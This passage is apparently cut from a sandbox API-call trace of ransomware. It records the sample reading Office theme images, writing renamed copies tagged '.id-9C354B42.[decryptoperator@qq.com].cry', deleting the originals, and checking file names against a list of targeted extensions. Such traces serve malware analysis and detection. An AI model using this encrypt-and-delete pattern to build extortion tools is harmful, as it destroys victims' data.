Shared\\THEMES14\\ICE\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0045.453] GetLastError () returned 0x0 [0045.453] ReadFile (in: hFile=0x190, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x4981, lpOverlapped=0x0) returned 1 [0045.454] WriteFile (in: hFile=0x184, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x4990, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x4990, lpOverlapped=0x0) returned 1 [0045.455] ReadFile (in: hFile=0x190, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0045.455] WriteFile (in: hFile=0x184, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xec, lpOverlapped=0x0) returned 1 [0045.455] SetEndOfFile (hFile=0x184) returned 1 [0045.456] CloseHandle (hObject=0x184) returned 1 [0045.456] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.456] SetEndOfFile (hFile=0x190) returned 1 [0045.456] CloseHandle (hObject=0x190) returned 1 [0045.457] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0045.457] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\thmbnail.png")) returned 1 [0045.457] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0045.457] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0045.457] lstrlenW (lpString=".doc") returned 4 [0045.457] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.457] lstrlenW (lpString=".docx") returned 5 [0045.457] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.457] lstrlenW (lpString=".pdf") returned 4 [0045.457] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.457] lstrlenW (lpString=".xls") returned 4 [0045.457] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.457] lstrlenW (lpString=".xlsx") returned 5 [0045.457] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.457] lstrlenW (lpString=".ppt") returned 4 [0045.457] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.457] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0045.457] lstrlenW (lpString=".zip") returned 4 [0045.457] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.457] lstrlenW (lpString=".rar") returned 4 [0045.457] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.457] lstrlenW (lpString=".bz2") returned 4 [0045.457] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.457] lstrlenW (lpString=".7z") returned 3 [0045.457] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.457] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0045.457] lstrlenW (lpString=".dbf") returned 4 [0045.458] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.458] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0045.458] lstrlenW (lpString=".1cd") returned 4 [0045.458] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.458] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0045.458] lstrlenW (lpString=".jpg") returned 4 [0045.458] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.458] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0045.458] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0045.458] lstrlenW (lpString=".doc") returned 4 [0045.458] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.458] lstrlenW (lpString=".docx") returned 5 [0045.458] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.458] lstrlenW (lpString=".pdf") returned 4 [0045.458] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.458] lstrlenW (lpString=".xls") returned 4 [0045.458] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.458] lstrlenW (lpString=".xlsx") returned 5 [0045.458] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.458] lstrlenW (lpString=".ppt") returned 4 [0045.458] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.458] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0045.458] lstrlenW (lpString=".zip") returned 4 [0045.458] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.458] lstrlenW (lpString=".rar") returned 4 [0045.458] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.458] lstrlenW (lpString=".bz2") returned 4 [0045.458] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.458] lstrlenW (lpString=".7z") returned 3 [0045.458] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.458] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0045.458] lstrlenW (lpString=".dbf") returned 4 [0045.458] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.458] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0045.458] lstrlenW (lpString=".1cd") returned 4 [0045.458] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.458] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG") returned 72 [0045.458] lstrlenW (lpString=".jpg") returned 4 [0045.459] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.459] lstrcmpiW (lpString1=".GIF", lpString2=".cry") returned 1 [0045.459] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0045.459] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0045.459] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=5179) returned 1 [0045.459] CloseHandle (hObject=0x190) returned 1 [0045.460] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\preview.gif")) returned 0x20 [0045.460] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0045.460] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0045.460] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.460] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.460] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0045.461] GetLastError () returned 0x0 [0045.461] ReadFile (in: hFile=0x190, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x143b, lpOverlapped=0x0) returned 1 [0045.469] WriteFile (in: hFile=0x184, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x1440, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x1440, lpOverlapped=0x0) returned 1 [0045.470] ReadFile (in: hFile=0x190, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0045.470] WriteFile (in: hFile=0x184, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xea, lpOverlapped=0x0) returned 1 [0045.470] SetEndOfFile (hFile=0x184) returned 1 [0045.470] CloseHandle (hObject=0x184) returned 1 [0045.470] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.470] SetEndOfFile (hFile=0x190) returned 1 [0045.471] CloseHandle (hObject=0x190) returned 1 [0045.471] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0045.471] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\preview.gif")) returned 1 [0045.471] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0045.471] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0045.471] lstrlenW (lpString=".doc") returned 4 [0045.471] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.471] lstrlenW (lpString=".docx") returned 5 [0045.471] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.471] lstrlenW (lpString=".pdf") returned 4 [0045.471] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.471] lstrlenW (lpString=".xls") returned 4 [0045.471] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.471] lstrlenW (lpString=".xlsx") returned 5 [0045.471] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.471] lstrlenW (lpString=".ppt") returned 4 [0045.472] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0045.472] lstrlenW (lpString=".zip") returned 4 [0045.472] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.472] lstrlenW (lpString=".rar") returned 4 [0045.472] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.472] lstrlenW (lpString=".bz2") returned 4 [0045.472] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.472] lstrlenW (lpString=".7z") returned 3 [0045.472] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0045.472] lstrlenW (lpString=".dbf") returned 4 [0045.472] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0045.472] lstrlenW (lpString=".1cd") returned 4 [0045.472] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0045.472] lstrlenW (lpString=".jpg") returned 4 [0045.472] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0045.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0045.472] lstrlenW (lpString=".doc") returned 4 [0045.472] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.472] lstrlenW (lpString=".docx") returned 5 [0045.472] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.472] lstrlenW (lpString=".pdf") returned 4 [0045.472] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.472] lstrlenW (lpString=".xls") returned 4 [0045.472] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.472] lstrlenW (lpString=".xlsx") returned 5 [0045.472] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.472] lstrlenW (lpString=".ppt") returned 4 [0045.472] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0045.472] lstrlenW (lpString=".zip") returned 4 [0045.472] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.472] lstrlenW (lpString=".rar") returned 4 [0045.472] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.473] lstrlenW (lpString=".bz2") returned 4 [0045.473] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.473] lstrlenW (lpString=".7z") returned 3 [0045.473] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.473] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0045.473] lstrlenW (lpString=".dbf") returned 4 [0045.473] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.473] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0045.473] lstrlenW (lpString=".1cd") returned 4 [0045.473] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.473] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\PREVIEW.GIF") returned 74 [0045.473] lstrlenW (lpString=".jpg") returned 4 [0045.473] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.473] lstrcmpiW (lpString1=".PNG", lpString2=".cry") returned 1 [0045.473] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0045.473] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0045.473] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=33559) returned 1 [0045.473] CloseHandle (hObject=0x190) returned 1 [0045.473] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\thmbnail.png")) returned 0x20 [0045.473] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0045.474] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0045.474] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.474] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.474] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0045.474] GetLastError () returned 0x0 [0045.474] ReadFile (in: hFile=0x190, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x8317, lpOverlapped=0x0) returned 1 [0045.486] WriteFile (in: hFile=0x184, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x8320, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x8320, lpOverlapped=0x0) returned 1 [0045.487] ReadFile (in: hFile=0x190, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0045.487] WriteFile (in: hFile=0x184, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xec, lpOverlapped=0x0) returned 1 [0045.487] SetEndOfFile (hFile=0x184) returned 1 [0045.487] CloseHandle (hObject=0x184) returned 1 [0045.487] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.487] SetEndOfFile (hFile=0x190) returned 1 [0045.488] CloseHandle (hObject=0x190) returned 1 [0045.488] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0045.488] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\indust\\thmbnail.png")) returned 1 [0045.489] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0045.489] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0045.489] lstrlenW (lpString=".doc") returned 4 [0045.489] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.489] lstrlenW (lpString=".docx") returned 5 [0045.489] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.489] lstrlenW (lpString=".pdf") returned 4 [0045.489] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.489] lstrlenW (lpString=".xls") returned 4 [0045.489] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.489] lstrlenW (lpString=".xlsx") returned 5 [0045.489] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.489] lstrlenW (lpString=".ppt") returned 4 [0045.489] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.489] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0045.489] lstrlenW (lpString=".zip") returned 4 [0045.489] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.489] lstrlenW (lpString=".rar") returned 4 [0045.489] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.489] lstrlenW (lpString=".bz2") returned 4 [0045.489] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.489] lstrlenW (lpString=".7z") returned 3 [0045.489] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.489] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0045.489] lstrlenW (lpString=".dbf") returned 4 [0045.489] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.489] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0045.489] lstrlenW (lpString=".1cd") returned 4 [0045.489] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.489] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0045.489] lstrlenW (lpString=".jpg") returned 4 [0045.489] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.489] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0045.489] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0045.490] lstrlenW (lpString=".doc") returned 4 [0045.490] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.490] lstrlenW (lpString=".docx") returned 5 [0045.490] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.490] lstrlenW (lpString=".pdf") returned 4 [0045.490] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.490] lstrlenW (lpString=".xls") returned 4 [0045.490] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.490] lstrlenW (lpString=".xlsx") returned 5 [0045.490] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.490] lstrlenW (lpString=".ppt") returned 4 [0045.490] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.490] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0045.490] lstrlenW (lpString=".zip") returned 4 [0045.490] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.490] lstrlenW (lpString=".rar") returned 4 [0045.490] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.490] lstrlenW (lpString=".bz2") returned 4 [0045.490] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.490] lstrlenW (lpString=".7z") returned 3 [0045.490] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.490] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0045.490] lstrlenW (lpString=".dbf") returned 4 [0045.490] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.490] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0045.490] lstrlenW (lpString=".1cd") returned 4 [0045.490] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.490] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\THMBNAIL.PNG") returned 75 [0045.490] lstrlenW (lpString=".jpg") returned 4 [0045.490] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.490] lstrcmpiW (lpString1=".GIF", lpString2=".cry") returned 1 [0045.490] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0045.490] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0045.491] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=2476) returned 1 [0045.491] CloseHandle (hObject=0x190) returned 1 [0045.491] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\preview.gif")) returned 0x20 [0045.491] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0045.491] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0045.491] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.491] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.491] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\iris\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, 